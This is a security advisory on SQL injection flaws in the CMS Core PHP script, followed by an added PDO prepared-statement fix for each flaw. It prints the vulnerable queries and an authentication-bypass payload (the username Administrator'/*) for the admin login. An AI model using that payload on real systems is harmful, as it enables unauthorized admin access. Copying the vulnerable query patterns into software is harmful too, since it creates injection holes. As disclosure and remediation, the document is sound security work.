// GHC -> CMS CORE <- ADVISORY
// Product: CMS Core
// URL: http://chipmunk-scripts.com/scripts/cmscore.php
// VULNERABILITY CLASS: SQL injection
/*==========================================*/

[1] script name: index.php

---[code]---
$EntryID=$_GET['EntryID'];
...
$article="SELECT * FROM CMS_articles where EntryID='$EntryID'";
---[/code]---

Possible SQL injection:
http://CMScore/index.php?EntryID=[SQL code]

[2] script name: index.php

---[code]---
$searchterm=$_POST[searchterm];
...
$newselect="Select * FROM CMS_articles where title LIKE %$searchterm% OR shortdescription LIKE %$searchterm% OR body LIKE %$searchterm% order by EntryID DESC LIMIT $start, $numentries";
---[/code]---

Possible SQL injection through the $searchterm variable in the search form.

[3] script name: admin/authenticate.php

---[code]---
$username=$_POST['username'];
$password=$_POST['password'];
$password=md5($password);
$query = "select * from CMS_logintable where username='$username' and password='$password'";
$result=mysql_query($query) or die("Could not Query");
---[/code]---

Possible SQL injection through the $username variable.

[exploit]
Log in with username Administrator'/* from the admin/index.php page.

[note]
"Administrator" must be a valid user name.

/* ================================================== */
/* www.ghc.ru -- security games & challenges */
/* ================================================== */
/* greets to: 1dt.w0lf & RST.void.ru, D0G4 */
/* & all quest hunters %) */
/* ================================================== */
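The three queries from findings [1], [2] and [3], rewritten with PDO prepared statements as an added example (this is not CMS Core's own code). It assumes a `$pdo` connection to the same CMS_articles / CMS_logintable schema with PDO::ERRMODE_EXCEPTION set, and, for [3], that stored passwords have been migrated from unsalted md5 to password_hash().

```php
<?php
// Added example, not CMS Core's code: every user-supplied value is bound as a
// parameter, so it reaches MySQL as data and never as part of the SQL text.

function fetch_article(PDO $pdo, string $entryId): ?array {
    // [1] index.php: EntryID is bound, so a value such as "1' OR '1'='1"
    // is compared literally instead of rewriting the WHERE clause.
    $stmt = $pdo->prepare('SELECT * FROM CMS_articles WHERE EntryID = :id');
    $stmt->execute([':id' => $entryId]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

function search_articles(PDO $pdo, string $term, int $start, int $count): array {
    // [2] index.php: the LIKE pattern is assembled in PHP with the user's own
    // % and _ escaped (MySQL's default LIKE escape character is backslash), and
    // the LIMIT values are range-checked and bound as integers.
    $pattern = '%' . addcslashes($term, '%_\\') . '%';
    $sql = 'SELECT * FROM CMS_articles
            WHERE title LIKE :t OR shortdescription LIKE :s OR body LIKE :b
            ORDER BY EntryID DESC LIMIT :start, :count';
    $stmt = $pdo->prepare($sql);
    $stmt->bindValue(':t', $pattern);
    $stmt->bindValue(':s', $pattern);
    $stmt->bindValue(':b', $pattern);
    $stmt->bindValue(':start', max(0, $start), PDO::PARAM_INT);
    $stmt->bindValue(':count', max(1, min($count, 100)), PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

function authenticate(PDO $pdo, string $username, string $password): bool {
    // [3] admin/authenticate.php: the username is bound, so "Administrator'/*"
    // is looked up as a literal string and matches no row; the password check
    // moves out of the SQL entirely. Assumption: the password column now holds
    // password_hash() output rather than the advisory's md5() value.
    $stmt = $pdo->prepare('SELECT password FROM CMS_logintable WHERE username = :u');
    $stmt->execute([':u' => $username]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row !== false && password_verify($password, $row['password']);
}
```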